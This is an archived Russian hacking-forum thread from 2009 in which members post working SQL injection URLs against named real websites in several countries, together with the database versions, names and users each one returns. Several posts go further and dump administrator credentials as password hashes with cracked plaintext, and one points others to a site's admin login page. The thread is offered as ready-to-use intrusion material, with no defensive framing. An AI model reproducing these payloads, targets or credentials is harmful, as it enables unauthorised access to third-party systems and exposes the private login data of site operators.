ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8161  
Старый 05.03.2009, 18:33
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.lancia.ro/noutati.php?id=-35+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versi on(),database(),user()),9

Database Version: 5.0.67-community
Database name: lancia2_content2
User name: lancia2_admcon@localhost
 
Ответить с цитированием

  #8162  
Старый 05.03.2009, 18:52
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

www.allbiz.com.my Pr-4 - какой то шоп или что типо того

PHP код:
http://www.allbiz.com.my/details3.php?ID=35&cid=223123123+union+select+1,2,3,concat_ws(0x3A,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+&type=P 
user:allbiz_mago@localhost
version:5.0.45-community
database:allbiz_portal

PHP код:
http://www.allbiz.com.my/details3.php?ID=35&cid=223123123+union+select+1,2,3,concat_ws(0x3A,user_name,password,level_access,status),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+allbiz_portal.admin_table+limit+0,1--+&type=P 
danny:37b7db0c3712a78e46046d78fff8b72a:d9:3:1 - danny:d9dojo1234

hang:ab50db46cef89a0a40d7efb4b39e75d0:33:3:1 - hang:3311111111

сюда пассы не подходят http://www.allbiz.com.my/admin/signmein.php, кому надо можети порыться
 
Ответить с цитированием

  #8163  
Старый 05.03.2009, 19:13
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://vantulschimbarii.ro/petitie.php?act=w&id=4+AND+ASCII(SUBSTRING((select +version()),1,1))=x

x=53,46,48,46,54,55,45,99,111,109,109,117,110,105, 116,121,45,108,111,103

http://vantulschimbarii.ro/petitie.php?act=w&id=4+AND+ASCII(SUBSTRING((select +database()),1,1))=x

x=118,97,110,116,117,108,115,99,95,109,97,103,111, 114


http://vantulschimbarii.ro/petitie.php?act=w&id=4+AND+ASCII(SUBSTRING((select +user()),1,1))=x

x=118,97,110,116,117,108,115,99,95,109,97,103,111, 114,64,108,111,99,97,108,104,111,115,116

Version : 5.0.67-community-log
Database : vantulsc_magor
User : vantulsc_magor@localhost
 
Ответить с цитированием

  #8164  
Старый 05.03.2009, 20:43
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Pagerank: 4
тИЦ: 500


Код:
http://www.fotik.com/one_news.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),us er()),8,9,10,11,12--

Database Version : 5.0.51a-community
Database name : db_fotik1
User name : fotik1@localhost



юзвери :

Код:
http://fotik.com/one_news.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_name,user_ pass),8,9,10,11,12+from+users+limit+0,1--

adm :

Код:
http://fotik.com/one_news.php?id=-1+union+select+1,2,3,4,5,6,conca t_ws(0x3a,name,pass),8,9,10,11,12+from+use r_site+limit+0,1--
Код:
Viktor:radio

Последний раз редактировалось f1ng3r; 06.03.2009 в 00:08.. Причина: jokester сорри не прогуглил
 
Ответить с цитированием

  #8165  
Старый 05.03.2009, 23:03
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

www.unitedoneproductions.org


Код:
http://www.unitedoneproductions.org/news.php?ax=v&n=11&id=7&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--


version: 4.1.22-standard
user: unitedon_user@localhost
database: unitedon_data
 
Ответить с цитированием

  #8166  
Старый 05.03.2009, 23:08
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

http://www.standardsuk.com/shop/products_view.php?prod=-37590+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,c ount(concat_ws(0x3a,email,password)),database(),ve rsion(),17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34+from+users--
 
Ответить с цитированием

  #8167  
Старый 06.03.2009, 00:15
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Налетай!
Код:
http://www.mbleague.at/game.php?ID=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12--
Код:
4.1.21-max-log:d006343d@localhost:d006343d
-----------------

Код:
http://www.transportforum.at/read.php?id=-1+union+all+select+0,1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),3,4,5--
Код:
4.1.10a:transport790ma@localhost:transportforum_at_-_news
----------------------------

Код:
http://www.styx-partners.com/at/view.php?id=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10--
Код:
5.0.45:styx-partners@localhost:styx-partners
--------------------------------

Код:
http://www.cameogolf.com/se/category.php?Id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3--
Код:
4.0.16-standard:apache@localhost:cameogol_1
-------------------------

Код:
http://www.wrcb.se/newsid.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3--
Код:
5.0.32-Debian_7etch8-log:wrcb_se@srv15.one.com:wrcb_se
----------------------

Код:
http://www.idrottshuset.se/readnews.php?ID=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8--
Код:
5.0.33-log:ih@localhost:ih
-------------------------------------------

Код:
http://www.kanalsyd.se/event.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10--
Код:
5.0.45-log:kanalsy_se@k7887@s83.loopia.se:kanalsyd_se
---------------------

Код:
http://www.universalmusic.se/labels.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4--
Код:
4.1.22-standard-log:umusic@localhost:universalmusic
--------------

Код:
http://www.roxyrecordings.se/news.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6--
Код:
4.1.18:rox
------------------------------------
The End!
 
Ответить с цитированием

  #8168  
Старый 06.03.2009, 01:09
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

christmasgifts.com

Код:
http://www.christmasgifts.com/sub-cat.php?ID=-90+union+select+1,version(),3,4,5
4.1.20
 
Ответить с цитированием

  #8169  
Старый 06.03.2009, 01:28
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.fad.ro/detalii.php?id=9128+UNION+SELECT+concat_ws(0x3a,ve rsion(),database(),user()),2,3,null,5,6,null,8--


Database Version: 5.0.67-community
Database name: fad_futurearfad
User name: fad_fad@localhost
 
Ответить с цитированием

  #8170  
Старый 06.03.2009, 01:31
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Pagerank: 5
тИЦ: 375


Код:
http://www.byttehnika.ru/?action=print_news_body&id_news=1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3,4--
Database Version : 5.0.38-Ubuntu_0ubuntu1.4-log
Database name : 003ru
User name : 003ru@localhost


adm:

Код:
http://www.byttehnika.ru/?action=print_news_body&id_news=1+union+select+concat_ws(0x3a,User ,password),2,3,4 +from+user+limit+1,1--
Код:
003ru_select:095fa070006515cf
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
 


Быстрый переход




ANTICHAT.XYZ